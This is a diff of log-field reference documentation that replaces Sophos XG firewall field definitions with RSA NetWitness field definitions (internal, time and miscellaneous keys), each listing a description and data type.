-*`sophos.xg.sent_pkts`*:: +*`rsa.internal.size`*:: + -- -Total number of packets sent - +This is the size of the session as seen by the NetWitness Decoder. This key should never be used to parse Meta data from a session (Logs/Packets) Directly, this is a Reserved key in NetWitness type: long -- -*`sophos.xg.received_pkts`*:: +*`rsa.internal.sourcefile`*:: + -- -Total number of packets received - +This is the name of the log file or PCAPs that can be imported into NetWitness. This key should never be used to parse Meta data from a session (Logs/Packets) Directly, this is a Reserved key in NetWitness -type: long +type: keyword -- -*`sophos.xg.sent_bytes`*:: +*`rsa.internal.ubc_req`*:: + -- -Total number of bytes sent - +This key is only used by the Entropy Parser, Unique byte count is the number of unique bytes seen in each stream. 256 would mean all byte values of 0 thru 255 were seen at least once type: long -- -*`sophos.xg.recv_bytes`*:: +*`rsa.internal.ubc_res`*:: + -- -Total number of bytes received - +This key is only used by the Entropy Parser, Unique byte count is the number of unique bytes seen in each stream. 256 would mean all byte values of 0 thru 255 were seen at least once type: long -- -*`sophos.xg.trans_src_ ip`*:: +*`rsa.internal.word`*:: + -- -Translated source IP address for outgoing traffic - +This is used by the Word Parsing technology to capture the first 5 character of every word in an unparsed log -type: ip +type: keyword -- -*`sophos.xg.trans_src_port`*:: + +*`rsa.time.event_time`*:: + -- -Translated source port for outgoing traffic - +This key is used to capture the time mentioned in a raw session that represents the actual time an event occured in a standard normalized form -type: integer +type: date -- -*`sophos.xg.trans_dst_ip`*:: +*`rsa.time.duration_time`*:: + -- -Translated destination IP address for outgoing traffic - +This key is used to capture the normalized duration/lifetime in seconds. -type: ip +type: double -- -*`sophos.xg.trans_dst_port`*:: +*`rsa.time.event_time_str`*:: + -- -Translated destination port for outgoing traffic - +This key is used to capture the incomplete time mentioned in a session as a string -type: integer +type: keyword -- -*`sophos.xg.srczonetype`*:: +*`rsa.time.starttime`*:: + -- -Type of source zone, e.g., LAN - +This key is used to capture the Start time mentioned in a session in a standard form -type: keyword +type: date -- -*`sophos.xg.srczone`*:: +*`rsa.time.month`*:: + -- -Name of source zone - - type: keyword -- -*`sophos.xg.dstzonetype`*:: +*`rsa.time.day`*:: + -- -Type of destination zone, e.g., WAN - - type: keyword -- -*`sophos.xg.dstzone`*:: +*`rsa.time.endtime`*:: + -- -Name of destination zone - +This key is used to capture the End time mentioned in a session in a standard form -type: keyword +type: date -- -*`sophos.xg.dir_disp`*:: +*`rsa.time.timezone`*:: + -- -TPacket direction. Possible values:“org”, “reply”, “” - +This key is used to capture the timezone of the Event Time type: keyword -- -*`sophos.xg.connevent`*:: +*`rsa.time.duration_str`*:: + -- -Event on which this log is generated - +A text string version of the duration type: keyword -- -*`sophos.xg.conn_id`*:: +*`rsa.time.date`*:: + -- -Unique identifier of connection - - -type: integer +type: keyword -- -*`sophos.xg.vconn_id`*:: +*`rsa.time.year`*:: + -- -Connection ID of the master connection - - -type: integer +type: keyword -- -*`sophos.xg.idp_policy_id`*:: +*`rsa.time.recorded_time`*:: + -- -IPS policy ID which is applied on the traffic - +The event time as recorded by the system the event is collected from. The usage scenario is a multi-tier application where the management layer of the system records it's own timestamp at the time of collection from its child nodes. Must be in timestamp format. -type: integer +type: date -- -*`sophos.xg.idp_policy_name`*:: +*`rsa.time.datetime`*:: + -- -IPS policy name i.e. IPS policy name which is applied on the traffic - - type: keyword -- -*`sophos.xg.signature_id`*:: +*`rsa.time.effective_time`*:: + -- -Signature ID - +This key is the effective time referenced by an individual event in a Standard Timestamp format -type: keyword +type: date -- -*`sophos.xg.signature_msg`*:: +*`rsa.time.expire_time`*:: + -- -Signature messsage - +This key is the timestamp that explicitly refers to an expiration. -type: keyword +type: date -- -*`sophos.xg.classification`*:: +*`rsa.time.process_time`*:: + -- -Signature classification - +Deprecated, use duration.time type: keyword -- -*`sophos.xg.rule_priority`*:: +*`rsa.time.hour`*:: + -- -Priority of IPS policy - - type: keyword -- -*`sophos.xg.platform`*:: +*`rsa.time.min`*:: + -- -Platform of the traffic. - - type: keyword -- -*`sophos.xg.category`*:: +*`rsa.time.timestamp`*:: + -- -IPS signature category. - - type: keyword -- -*`sophos.xg.target`*:: +*`rsa.time.event_queue_time`*:: + -- -Platform of the traffic. - +This key is the Time that the event was queued. -type: keyword +type: date -- -*`sophos.xg.eventid`*:: +*`rsa.time.p_time1`*:: + -- -ATP Evenet ID - - type: keyword -- -*`sophos.xg.ep_uuid`*:: +*`rsa.time.tzone`*:: + -- -Endpoint UUID - - type: keyword -- -*`sophos.xg.threatname`*:: +*`rsa.time.eventtime`*:: + -- -ATP threatname - - type: keyword -- -*`sophos.xg.sourceip`*:: +*`rsa.time.gmtdate`*:: + -- -Original source IP address of traffic - - -type: ip +type: keyword -- -*`sophos.xg.destinationip`*:: +*`rsa.time.gmttime`*:: + -- -Original destination IP address of traffic - - -type: ip +type: keyword -- -*`sophos.xg.login_user`*:: +*`rsa.time.p_date`*:: + -- -ATP login user - - type: keyword -- -*`sophos.xg.eventtype`*:: +*`rsa.time.p_month`*:: + -- -ATP event type - - type: keyword -- -*`sophos.xg.execution_path`*:: +*`rsa.time.p_time`*:: + -- -ATP execution path - - type: keyword -- -*`sophos.xg.av_policy_name`*:: +*`rsa.time.p_time2`*:: + -- -Malware scanning policy name which is applied on the traffic - - type: keyword -- -*`sophos.xg.from_email_address`*:: +*`rsa.time.p_year`*:: + -- -Sender email address - - type: keyword -- -*`sophos.xg.to_email_address`*:: +*`rsa.time.expire_time_str`*:: + -- -Receipeint email address - +This key is used to capture incomplete timestamp that explicitly refers to an expiration. type: keyword -- -*`sophos.xg.subject`*:: +*`rsa.time.stamp`*:: + -- -Email subject - +Deprecated key defined only in table map. -type: keyword +type: date -- -*`sophos.xg.mailsize`*:: + +*`rsa.misc.action`*:: + -- -mailsize - - -type: integer +type: keyword -- -*`sophos.xg.virus`*:: +*`rsa.misc.result`*:: + -- -virus name - +This key is used to capture the outcome/result string value of an action in a session. type: keyword -- -*`sophos.xg.FTP_url`*:: +*`rsa.misc.severity`*:: + -- -FTP URL from which virus was downloaded - +This key is used to capture the severity given the session type: keyword -- -*`sophos.xg.FTP_direction`*:: +*`rsa.misc.event_type`*:: + -- -Direction of FTP transfer: Upload or Download - +This key captures the event category type as specified by the event source. type: keyword -- -*`sophos.xg.filesize`*:: +*`rsa.misc.reference_id`*:: + -- -Size of the file that contained virus - +This key is used to capture an event id from the session directly -type: integer +type: keyword -- -*`sophos.xg.filepath`*:: +*`rsa.misc.version`*:: + -- -Path of the file containing virus - +This key captures Version of the application or OS which is generating the event. type: keyword -- -*`sophos.xg.filename`*:: +*`rsa.misc.disposition`*:: + -- -File name associated with the event - +This key captures the The end state of an action. type: keyword -- -*`sophos.xg.ftpcommand`*:: +*`rsa.misc.result_code`*:: + -- -FTP command used when virus was found - +This key is used to capture the outcome/result numeric value of an action in a session type: keyword -- -*`sophos.xg.url`*:: +*`rsa.misc.category`*:: + -- -URL from which virus was downloaded - +This key is used to capture the category of an event given by the vendor in the session type: keyword -- -*`sophos.xg.domainname`*:: +*`rsa.misc.obj_name`*:: + -- -Domain from which virus was downloaded - +This is used to capture name of object type: keyword -- -*`sophos.xg.quarantine`*:: +*`rsa.misc.obj_type`*:: + -- -Path and filename of the file quarantined - +This is used to capture type of object type: keyword -- -*`sophos.xg.src_domainname`*:: +*`rsa.misc.event_source`*:: + -- -Sender domain name - +This key captures Source of the event that’s not a hostname type: keyword -- -*`sophos.xg.dst_domainname`*:: +*`rsa.misc.log_session_id`*:: + -- -Receiver domain name - +This key is used to capture a sessionid from the session directly type: keyword -- -*`sophos.xg.reason`*:: +*`rsa.misc.group`*:: + -- -Reason why the record was detected as spam/malicious - +This key captures the Group Name value type: keyword -- -*`sophos.xg.referer`*:: +*`rsa.misc.policy_name`*:: + -- -Referer - +This key is used to capture the Policy Name only. type: keyword -- -*`sophos.xg.spamaction`*:: +*`rsa.misc.rule_name`*:: + -- -Spam Action - +This key captures the Rule Name type: keyword -- -*`sophos.xg.mailid`*:: +*`rsa.misc.context`*:: + -- -mailid - +This key captures Information which adds additional context to the event. type: keyword -- -*`sophos.xg.quarantine_reason`*:: +*`rsa.misc.change_new`*:: + -- -Quarantine reason - +This key is used to capture the new values of the attribute that’s changing in a session type: keyword -- -*`sophos.xg.status_code`*:: +*`rsa.misc.space`*:: + -- -Status code - - type: keyword -- -*`sophos.xg.override_token`*:: +*`rsa.misc.client`*:: + -- -Override token - +This key is used to capture only the name of the client application requesting resources of the server. See the user.agent meta key for capture of the specific user agent identifier or browser identification string. type: keyword -- -*`sophos.xg.con_id`*:: +*`rsa.misc.msgIdPart1`*:: + -- -Unique identifier of connection - - -type: integer +type: keyword -- -*`sophos.xg.override_authorizer`*:: +*`rsa.misc.msgIdPart2`*:: + -- -Override authorizer - - type: keyword -- -*`sophos.xg.transactionid`*:: +*`rsa.misc.change_old`*:: + -- -Transaction ID of the AV scan. - +This key is used to capture the old value of the attribute that’s changing in a session type: keyword -- -*`sophos.xg.upload_file_type`*:: +*`rsa.misc.operation_id`*:: + -- -Upload file type - +An alert number or operation number. The values should be unique and non-repeating. type: keyword -- -*`sophos.xg.upload_file_name`*:: +*`rsa.misc.event_state`*:: + -- -Upload file name - +This key captures the current state of the object/item referenced within the event. Describing an on-going event. type: keyword -- -*`sophos.xg.httpresponsecode`*:: +*`rsa.misc.group_object`*:: + -- -code of HTTP response - +This key captures a collection/grouping of entities. Specific usage -type: long +type: keyword -- -*`sophos.xg.user_gp`*:: +*`rsa.misc.node`*:: + -- -Group name to which the user belongs. - +Common use case is the node name within a cluster. The cluster name is reflected by the host name. type: keyword -- -*`sophos.xg.category_type`*:: +*`rsa.misc.rule`*:: + -- -Type of category under which website falls - +This key captures the Rule number type: keyword -- -*`sophos.xg.download_file_type`*:: +*`rsa.misc.device_name`*:: + -- -Download file type - +This is used to capture name of the Device associated with the node Like: a physical disk, printer, etc type: keyword -- -*`sophos.xg.exceptions`*:: +*`rsa.misc.param`*:: + -- -List of the checks excluded by web exceptions. - +This key is the parameters passed as part of a command or application, etc. type: keyword -- -*`sophos.xg.contenttype`*:: +*`rsa.misc.change_attrib`*:: + -- -Type of the content - +This key is used to capture the name of the attribute that’s changing in a session type: keyword -- -*`sophos.xg.override_name`*:: +*`rsa.misc.event_computer`*:: + -- -Override name - +This key is a windows only concept, where this key is used to capture fully qualified domain name in a windows log. type: keyword -- -*`sophos.xg.activityname`*:: +*`rsa.misc.reference_id1`*:: + -- -Web policy activity that matched and caused the policy result. - +This key is for Linked ID to be used as an addition to "reference.id" type: keyword -- -*`sophos.xg.download_file_name`*:: +*`rsa.misc.event_log`*:: + -- -Download file name - +This key captures the Name of the event log type: keyword -- -*`sophos.xg.sha1sum`*:: +*`rsa.misc.OS`*:: + -- -SHA1 checksum of the item being analyzed - +This key captures the Name of the Operating System type: keyword -- -*`sophos.xg.message_id`*:: +*`rsa.misc.terminal`*:: + -- -Message ID - +This key captures the Terminal Names only type: keyword -- -*`sophos.xg.connid`*:: +*`rsa.misc.msgIdPart3`*:: + -- -Connection ID - - type: keyword -- -*`sophos.xg.message`*:: +*`rsa.misc.filter`*:: + -- -Message - +This key captures Filter used to reduce result set type: keyword -- -*`sophos.xg.email_subject`*:: +*`rsa.misc.serial_number`*:: + -- -Email Subject - +This key is the Serial number associated with a physical asset. type: keyword -- -*`sophos.xg.file_path`*:: +*`rsa.misc.checksum`*:: + -- -File path - +This key is used to capture the checksum or hash of the entity such as a file or process. Checksum should be used over checksum.src or checksum.dst when it is unclear whether the entity is a source or target of an action. type: keyword -- -*`sophos.xg.dstdomain`*:: +*`rsa.misc.event_user`*:: + -- -Destination Domain - +This key is a windows only concept, where this key is used to capture combination of domain name and username in a windows log. type: keyword -- -*`sophos.xg.file_size`*:: +*`rsa.misc.virusname`*:: + -- -File Size - +This key captures the name of the virus -type: integer +type: keyword -- -*`sophos.xg.transaction_id`*:: +*`rsa.misc.content_type`*:: + -- -Transaction ID - +This key is used to capture Content Type only. type: keyword -- -*`sophos.xg.website`*:: +*`rsa.misc.group_id`*:: + -- -Website - +This key captures Group ID Number (related to the group name) type: keyword -- -*`sophos.xg.file_name`*:: +*`rsa.misc.policy_id`*:: + -- -Filename - +This key is used to capture the Policy ID only, this should be a numeric value, use policy.name otherwise type: keyword -- -*`sophos.xg.context_prefix`*:: +*`rsa.misc.vsys`*:: + -- -Content Prefix - +This key captures Virtual System Name type: keyword -- -*`sophos.xg.site_category`*:: +*`rsa.misc.connection_id`*:: + -- -Site Category - +This key captures the Connection ID type: keyword -- -*`sophos.xg.context_suffix`*:: +*`rsa.misc.reference_id2`*:: + -- -Context Suffix - +This key is for the 2nd Linked ID. Can be either linked to "reference.id" or "reference.id1" value but should not be used unless the other two variables are in play. type: keyword -- -*`sophos.xg.dictionary_name`*:: +*`rsa.misc.sensor`*:: + -- -Dictionary Name - +This key captures Name of the sensor. Typically used in IDS/IPS based devices type: keyword -- -*`sophos.xg.action`*:: +*`rsa.misc.sig_id`*:: + -- -Event Action - +This key captures IDS/IPS Int Signature ID -type: keyword +type: long -- -*`sophos.xg.user`*:: +*`rsa.misc.port_name`*:: + -- -User - +This key is used for Physical or logical port connection but does NOT include a network port. (Example: Printer port name). type: keyword -- -*`sophos.xg.context_match`*:: +*`rsa.misc.rule_group`*:: + -- -Context Match - +This key captures the Rule group name type: keyword -- -*`sophos.xg.direction`*:: +*`rsa.misc.risk_num`*:: + -- -Direction - +This key captures a Numeric Risk value -type: keyword +type: double -- -*`sophos.xg.auth_client`*:: +*`rsa.misc.trigger_val`*:: + -- -Auth Client - +This key captures the Value of the trigger or threshold condition. type: keyword -- -*`sophos.xg.auth_mechanism`*:: +*`rsa.misc.log_session_id1`*:: + -- -Auth mechanism - +This key is used to capture a Linked (Related) Session ID from the session directly type: keyword -- -*`sophos.xg.connectionname`*:: +*`rsa.misc.comp_version`*:: + -- -Connectionname - +This key captures the Version level of a sub-component of a product. type: keyword -- -*`sophos.xg.remotenetwork`*:: +*`rsa.misc.content_version`*:: + -- -remotenetwork - +This key captures Version level of a signature or database content. type: keyword -- -*`sophos.xg.localgateway`*:: +*`rsa.misc.hardware_id`*:: + -- -Localgateway - +This key is used to capture unique identifier for a device or system (NOT a Mac address) type: keyword -- -*`sophos.xg.localnetwork`*:: +*`rsa.misc.risk`*:: + -- -Localnetwork - +This key captures the non-numeric risk value type: keyword -- -*`sophos.xg.connectiontype`*:: +*`rsa.misc.event_id`*:: + -- -Connectiontype - - type: keyword -- -*`sophos.xg.oldversion`*:: +*`rsa.misc.reason`*:: + -- -Oldversion - - type: keyword -- -*`sophos.xg.newversion`*:: +*`rsa.misc.status`*:: + -- -Newversion - - type: keyword -- -*`sophos.xg.ipaddress`*:: +*`rsa.misc.mail_id`*:: + -- -Ipaddress - +This key is used to capture the mailbox id/name type: keyword -- -*`sophos.xg.client_physical_address`*:: +*`rsa.misc.rule_uid`*:: + -- -Client physical address - +This key is the Unique Identifier for a rule. type: keyword -- -*`sophos.xg.client_host_name`*:: +*`rsa.misc.trigger_desc`*:: + -- -Client host name - +This key captures the Description of the trigger or threshold condition. type: keyword -- -*`sophos.xg.raw_data`*:: +*`rsa.misc.inout`*:: + -- -Raw data - - type: keyword -- -*`sophos.xg.Mode`*:: +*`rsa.misc.p_msgid`*:: + -- -Mode - - type: keyword -- -*`sophos.xg.sessionid`*:: +*`rsa.misc.data_type`*:: + -- -Sessionid - - type: keyword -- -*`sophos.xg.starttime`*:: +*`rsa.misc.msgIdPart4`*:: + -- -Starttime - - -type: date +type: keyword -- -*`sophos.xg.remote_ip`*:: +*`rsa.misc.error`*:: + -- -Remote IP - +This key captures All non successful Error codes or responses -type: ip +type: keyword -- -*`sophos.xg.timestamp`*:: +*`rsa.misc.index`*:: + -- -timestamp - - -type: date +type: keyword -- -*`sophos.xg.SysLog_SERVER_NAME`*:: +*`rsa.misc.listnum`*:: + -- -SysLog SERVER NAME - +This key is used to capture listname or listnumber, primarily for collecting access-list type: keyword -- -*`sophos.xg.backup_mode`*:: +*`rsa.misc.ntype`*:: + -- -Backup mode - - type: keyword -- -*`sophos.xg.source`*:: +*`rsa.misc.observed_val`*:: + -- -Source - +This key captures the Value observed (from the perspective of the device generating the log). type: keyword -- -*`sophos.xg.server`*:: +*`rsa.misc.policy_value`*:: + -- -Server - +This key captures the contents of the policy. This contains details about the policy type: keyword -- -*`sophos.xg.host`*:: +*`rsa.misc.pool_name`*:: + -- -Host - +This key captures the name of a resource pool type: keyword -- -*`sophos.xg.responsetime`*:: +*`rsa.misc.rule_template`*:: + -- -Responsetime - +A default set of parameters which are overlayed onto a rule (or rulename) which efffectively constitutes a template -type: long +type: keyword -- -*`sophos.xg.cookie`*:: +*`rsa.misc.count`*:: + -- -cookie - - type: keyword -- -*`sophos.xg.querystring`*:: +*`rsa.misc.number`*:: + -- -querystring - - type: keyword -- -*`sophos.xg.extra`*:: +*`rsa.misc.sigcat`*:: + -- -extra - - type: keyword -- -*`sophos.xg.PHPSESSID`*:: +*`rsa.misc.type`*:: + -- -PHPSESSID - - type: keyword -- -*`sophos.xg.start_time`*:: +*`rsa.misc.comments`*:: + -- -Start time - +Comment information provided in the log message -type: date +type: keyword -- -*`sophos.xg.eventtime`*:: +*`rsa.misc.doc_number`*:: + -- -Event time - +This key captures File Identification number -type: date +type: long -- -*`sophos.xg.red_id`*:: +*`rsa.misc.expected_val`*:: + -- -RED ID - +This key captures the Value expected (from the perspective of the device generating the log). type: keyword -- -*`sophos.xg.branch_name`*:: +*`rsa.misc.job_num`*:: + -- -Branch Name - +This key captures the Job Number type: keyword -- -*`sophos.xg.updatedip`*:: +*`rsa.misc.spi_dst`*:: + -- -updatedip - +Destination SPI Index -type: ip +type: keyword -- -*`sophos.xg.idle_cpu`*:: +*`rsa.misc.spi_src`*:: + -- -idle ## - +Source SPI Index -type: float +type: keyword -- -*`sophos.xg.system_cpu`*:: +*`rsa.misc.code`*:: + -- -system - - -type: float +type: keyword -- -*`sophos.xg.user_cpu`*:: +*`rsa.misc.agent_id`*:: + -- -system - +This key is used to capture agent id -type: float +type: keyword -- -*`sophos.xg.used`*:: +*`rsa.misc.message_body`*:: + -- -used - +This key captures the The contents of the message body. -type: integer +type: keyword -- -*`sophos.xg.unit`*:: +*`rsa.misc.phone`*:: + -- -unit - - type: keyword -- -*`sophos.xg.total_memory`*:: +*`rsa.misc.sig_id_str`*:: + -- -Total Memory - +This key captures a string object of the sigid variable. -type: integer +type: keyword -- -*`sophos.xg.free`*:: +*`rsa.misc.cmd`*:: + -- -free - - -type: integer +type: keyword -- -*`sophos.xg.transmittederrors`*:: +*`rsa.misc.misc`*:: + -- -transmitted errors - - type: keyword -- -*`sophos.xg.receivederrors`*:: +*`rsa.misc.name`*:: + -- -received errors - - type: keyword -- -*`sophos.xg.receivedkbits`*:: +*`rsa.misc.cpu`*:: + -- -received kbits - +This key is the CPU time used in the execution of the event being recorded. type: long -- -*`sophos.xg.transmittedkbits`*:: +*`rsa.misc.event_desc`*:: + -- -transmitted kbits - +This key is used to capture a description of an event available directly or inferred -type: long +type: keyword -- -*`sophos.xg.transmitteddrops`*:: +*`rsa.misc.sig_id1`*:: + -- -transmitted drops - +This key captures IDS/IPS Int Signature ID. This must be linked to the sig.id type: long -- -*`sophos.xg.receiveddrops`*:: +*`rsa.misc.im_buddyid`*:: + -- -received drops - - -type: long +type: keyword -- -*`sophos.xg.collisions`*:: +*`rsa.misc.im_client`*:: + -- -collisions - - -type: long +type: keyword -- -*`sophos.xg.interface`*:: +*`rsa.misc.im_userid`*:: + -- -interface - - type: keyword -- -*`sophos.xg.Configuration`*:: +*`rsa.misc.pid`*:: + -- -Configuration - - -type: float +type: keyword -- -*`sophos.xg.Reports`*:: +*`rsa.misc.priority`*:: + -- -Reports - - -type: float +type: keyword -- -*`sophos.xg.Signature`*:: +*`rsa.misc.context_subject`*:: + -- -Signature - +This key is to be used in an audit context where the subject is the object being identified -type: float +type: keyword -- -*`sophos.xg.Temp`*:: +*`rsa.misc.context_target`*:: + -- -Temp - - -type: float +type: keyword -- -*`sophos.xg.users`*:: +*`rsa.misc.cve`*:: + -- -users - +This key captures CVE (Common Vulnerabilities and Exposures) - an identifier for known information security vulnerabilities. type: keyword -- -*`sophos.xg.ssid`*:: +*`rsa.misc.fcatnum`*:: + -- -ssid - +This key captures Filter Category Number. Legacy Usage type: keyword -- -*`sophos.xg.ap`*:: +*`rsa.misc.library`*:: + -- -ap - +This key is used to capture library information in mainframe devices type: keyword -- -*`sophos.xg.clients_conn_ssid`*:: +*`rsa.misc.parent_node`*:: + -- -clients connection ssid - +This key captures the Parent Node Name. Must be related to node variable. type: keyword -- -[[exported-fields-squid]] -== Squid fields - -squid fields. - - - -*`network.interface.name`*:: +*`rsa.misc.risk_info`*:: + -- -Name of the network interface where the traffic has been observed. - +Deprecated, use New Hunting Model (inv.*, ioc, boc, eoc, analysis.*) type: keyword -- - - -*`rsa.internal.msg`*:: +*`rsa.misc.tcp_flags`*:: + -- -This key is used to capture the raw message that comes into the Log Decoder +This key is captures the TCP flags set in any packet of session -type: keyword +type: long -- -*`rsa.internal.messageid`*:: +*`rsa.misc.tos`*:: + -- -type: keyword +This key describes the type of service + +type: long -- -*`rsa.internal.event_desc`*:: +*`rsa.misc.vm_target`*:: + -- +VMWare Target **VMWARE** only varaible. + type: keyword -- -*`rsa.internal.message`*:: +*`rsa.misc.workspace`*:: + -- -This key captures the contents of instant messages +This key captures Workspace Description type: keyword -- -*`rsa.internal.time`*:: +*`rsa.misc.command`*:: + -- -This is the time at which a session hits a NetWitness Decoder. This key should never be used to parse Meta data from a session (Logs/Packets) Directly, this is a Reserved key in NetWitness. - -type: date +type: keyword -- -*`rsa.internal.level`*:: +*`rsa.misc.event_category`*:: + -- -Deprecated key defined only in table map. - -type: long +type: keyword -- -*`rsa.internal.msg_id`*:: +*`rsa.misc.facilityname`*:: + -- -This is the Message ID1 value that identifies the exact log parser definition which parses a particular log session. This key should never be used to parse Meta data from a session (Logs/Packets) Directly, this is a Reserved key in NetWitness - type: keyword -- -*`rsa.internal.msg_vid`*:: +*`rsa.misc.forensic_info`*:: + -- -This is the Message ID2 value that identifies the exact log parser definition which parses a particular log session. This key should never be used to parse Meta data from a session (Logs/Packets) Directly, this is a Reserved key in NetWitness - type: keyword -- -*`rsa.internal.data`*:: +*`rsa.misc.jobname`*:: + -- -Deprecated key defined only in table map. - type: keyword -- -*`rsa.internal.obj_server`*:: +*`rsa.misc.mode`*:: + -- -Deprecated key defined only in table map. - type: keyword -- -*`rsa.internal.obj_val`*:: +*`rsa.misc.policy`*:: + -- -Deprecated key defined only in table map. - type: keyword -- -*`rsa.internal.resource`*:: +*`rsa.misc.policy_waiver`*:: + -- -Deprecated key defined only in table map. - type: keyword -- -*`rsa.internal.obj_id`*:: +*`rsa.misc.second`*:: + -- -Deprecated key defined only in table map. - type: keyword -- -*`rsa.internal.statement`*:: +*`rsa.misc.space1`*:: + -- -Deprecated key defined only in table map. - type: keyword -- -*`rsa.internal.audit_class`*:: +*`rsa.misc.subcategory`*:: + -- -Deprecated key defined only in table map. - type: keyword -- -*`rsa.internal.entry`*:: +*`rsa.misc.tbdstr2`*:: + -- -Deprecated key defined only in table map. - type: keyword -- -*`rsa.internal.hcode`*:: +*`rsa.misc.alert_id`*:: + -- -Deprecated key defined only in table map. +Deprecated, New Hunting Model (inv.*, ioc, boc, eoc, analysis.*) type: keyword -- -*`rsa.internal.inode`*:: +*`rsa.misc.checksum_dst`*:: + -- -Deprecated key defined only in table map. +This key is used to capture the checksum or hash of the the target entity such as a process or file. -type: long +type: keyword -- -*`rsa.internal.resource_class`*:: +*`rsa.misc.checksum_src`*:: + -- -Deprecated key defined only in table map. +This key is used to capture the checksum or hash of the source entity such as a file or process. type: keyword -- -*`rsa.internal.dead`*:: +*`rsa.misc.fresult`*:: + -- -Deprecated key defined only in table map. +This key captures the Filter Result type: long -- -*`rsa.internal.feed_desc`*:: +*`rsa.misc.payload_dst`*:: + -- -This is used to capture the description of the feed. This key should never be used to parse Meta data from a session (Logs/Packets) Directly, this is a Reserved key in NetWitness +This key is used to capture destination payload type: keyword -- -*`rsa.internal.feed_name`*:: +*`rsa.misc.payload_src`*:: + -- -This is used to capture the name of the feed. This key should never be used to parse Meta data from a session (Logs/Packets) Directly, this is a Reserved key in NetWitness +This key is used to capture source payload type: keyword -- -*`rsa.internal.cid`*:: +*`rsa.misc.pool_id`*:: + -- -This is the unique identifier used to identify a NetWitness Concentrator. This key should never be used to parse Meta data from a session (Logs/Packets) Directly, this is a Reserved key in NetWitness +This key captures the identifier (typically numeric field) of a resource pool type: keyword -- -*`rsa.internal.device_class`*:: +*`rsa.misc.process_id_val`*:: + -- -This is the Classification of the Log Event Source under a predefined fixed set of Event Source Classifications. This key should never be used to parse Meta data from a session (Logs/Packets) Directly, this is a Reserved key in NetWitness +This key is a failure key for Process ID when it is not an integer value type: keyword -- -*`rsa.internal.device_group`*:: +*`rsa.misc.risk_num_comm`*:: + -- -This key should never be used to parse Meta data from a session (Logs/Packets) Directly, this is a Reserved key in NetWitness +This key captures Risk Number Community -type: keyword +type: double -- -*`rsa.internal.device_host`*:: +*`rsa.misc.risk_num_next`*:: + -- -This is the Hostname of the log Event Source sending the logs to NetWitness. This key should never be used to parse Meta data from a session (Logs/Packets) Directly, this is a Reserved key in NetWitness +This key captures Risk Number NextGen -type: keyword +type: double -- -*`rsa.internal.device_ip`*:: +*`rsa.misc.risk_num_sand`*:: + -- -This is the IPv4 address of the Log Event Source sending the logs to NetWitness. This key should never be used to parse Meta data from a session (Logs/Packets) Directly, this is a Reserved key in NetWitness +This key captures Risk Number SandBox -type: ip +type: double -- -*`rsa.internal.device_ipv6`*:: +*`rsa.misc.risk_num_static`*:: + -- -This is the IPv6 address of the Log Event Source sending the logs to NetWitness. This key should never be used to parse Meta data from a session (Logs/Packets) Directly, this is a Reserved key in NetWitness +This key captures Risk Number Static -type: ip +type: double -- -*`rsa.internal.device_type`*:: +*`rsa.misc.risk_suspicious`*:: + -- -This is the name of the log parser which parsed a given session. This key should never be used to parse Meta data from a session (Logs/Packets) Directly, this is a Reserved key in NetWitness +Deprecated, use New Hunting Model (inv.*, ioc, boc, eoc, analysis.*) type: keyword -- -*`rsa.internal.device_type_id`*:: +*`rsa.misc.risk_warning`*:: + -- -Deprecated key defined only in table map. +Deprecated, use New Hunting Model (inv.*, ioc, boc, eoc, analysis.*) -type: long +type: keyword -- -*`rsa.internal.did`*:: +*`rsa.misc.snmp_oid`*:: + -- -This is the unique identifier used to identify a NetWitness Decoder. This key should never be used to parse Meta data from a session (Logs/Packets) Directly, this is a Reserved key in NetWitness +SNMP Object Identifier type: keyword -- -*`rsa.internal.entropy_req`*:: +*`rsa.misc.sql`*:: + -- -This key is only used by the Entropy Parser, the Meta Type can be either UInt16 or Float32 based on the configuration +This key captures the SQL query -type: long +type: keyword -- -*`rsa.internal.entropy_res`*:: +*`rsa.misc.vuln_ref`*:: + -- -This key is only used by the Entropy Parser, the Meta Type can be either UInt16 or Float32 based on the configuration +This key captures the Vulnerability Reference details -type: long +type: keyword -- -*`rsa.internal.event_name`*:: +*`rsa.misc.acl_id`*:: + -- -Deprecated key defined only in table map. - type: keyword -- -*`rsa.internal.feed_category`*:: +*`rsa.misc.acl_op`*:: + -- -This is used to capture the category of the feed. This key should never be used to parse Meta data from a session (Logs/Packets) Directly, this is a Reserved key in NetWitness - type: keyword -- -*`rsa.internal.forward_ip`*:: +*`rsa.misc.acl_pos`*:: + -- -This key should be used to capture the IPV4 address of a relay system which forwarded the events from the original system to NetWitness. - -type: ip +type: keyword -- -*`rsa.internal.forward_ipv6`*:: +*`rsa.misc.acl_table`*:: + -- -This key is used to capture the IPV6 address of a relay system which forwarded the events from the original system to NetWitness. This key should never be used to parse Meta data from a session (Logs/Packets) Directly, this is a Reserved key in NetWitness - -type: ip +type: keyword -- -*`rsa.internal.header_id`*:: +*`rsa.misc.admin`*:: + -- -This is the Header ID value that identifies the exact log parser header definition that parses a particular log session. This key should never be used to parse Meta data from a session (Logs/Packets) Directly, this is a Reserved key in NetWitness - type: keyword -- -*`rsa.internal.lc_cid`*:: +*`rsa.misc.alarm_id`*:: + -- -This is a unique Identifier of a Log Collector. This key should never be used to parse Meta data from a session (Logs/Packets) Directly, this is a Reserved key in NetWitness - type: keyword -- -*`rsa.internal.lc_ctime`*:: +*`rsa.misc.alarmname`*:: + -- -This is the time at which a log is collected in a NetWitness Log Collector. This key should never be used to parse Meta data from a session (Logs/Packets) Directly, this is a Reserved key in NetWitness - -type: date +type: keyword -- -*`rsa.internal.mcb_req`*:: +*`rsa.misc.app_id`*:: + -- -This key is only used by the Entropy Parser, the most common byte request is simply which byte for each side (0 thru 255) was seen the most - -type: long +type: keyword -- -*`rsa.internal.mcb_res`*:: +*`rsa.misc.audit`*:: + -- -This key is only used by the Entropy Parser, the most common byte response is simply which byte for each side (0 thru 255) was seen the most - -type: long +type: keyword -- -*`rsa.internal.mcbc_req`*:: +*`rsa.misc.audit_object`*:: + -- -This key is only used by the Entropy Parser, the most common byte count is the number of times the most common byte (above) was seen in the session streams - -type: long +type: keyword -- -*`rsa.internal.mcbc_res`*:: +*`rsa.misc.auditdata`*:: + -- -This key is only used by the Entropy Parser, the most common byte count is the number of times the most common byte (above) was seen in the session streams - -type: long +type: keyword -- -*`rsa.internal.medium`*:: +*`rsa.misc.benchmark`*:: + -- -This key is used to identify if it’s a log/packet session or Layer 2 Encapsulation Type. This key should never be used to parse Meta data from a session (Logs/Packets) Directly, this is a Reserved key in NetWitness. 32 = log, 33 = correlation session, < 32 is packet session - -type: long +type: keyword -- -*`rsa.internal.node_name`*:: +*`rsa.misc.bypass`*:: + -- 